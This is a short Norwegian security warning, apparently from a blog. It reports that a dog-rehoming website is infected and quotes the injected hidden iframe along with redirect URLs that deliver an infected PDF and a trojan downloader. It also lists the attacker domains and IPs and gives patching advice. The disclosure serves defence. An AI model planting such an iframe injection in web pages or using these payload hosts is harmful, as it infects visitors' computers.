Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.

Javascript-injeksjonen, som er lagt inn på siden, henter info fra:

<iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1

height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>

Via redirect :

hxxp://vpsspeedin.ru/x/pdf.php -> henter en infisert .pdf-fil (adobe reader)

hxxp://vpsspeedin.ru/x/load.php?id=x -> henter en TrojanDownloader, XPpoliceAntivirus

Domener involvert:

thehugetitstop.cn 91.212.65.33

gianthighestfind.cn 91.212.65.33

tozxiqud.cn 91.212.65.7

vpsspeedin.ru 91.212.65.33

ralcofic.cn 91.212.65.7

8addition.info 210.48.154.132

I tillegg er det tegn på at pc'n vil bli forsøkt inkl. i et botnet knyttet til epost-spam.

Infeksjonen er vanlig og prøver å utnytte kjente sårbarheter knyttet til

Flash Player

Adobe Reader

Office Snapshot Viewer

Tiltak er å holde programmene (inkl antivirus) oppdatert. Benytt gjerne F-secure sin Health Check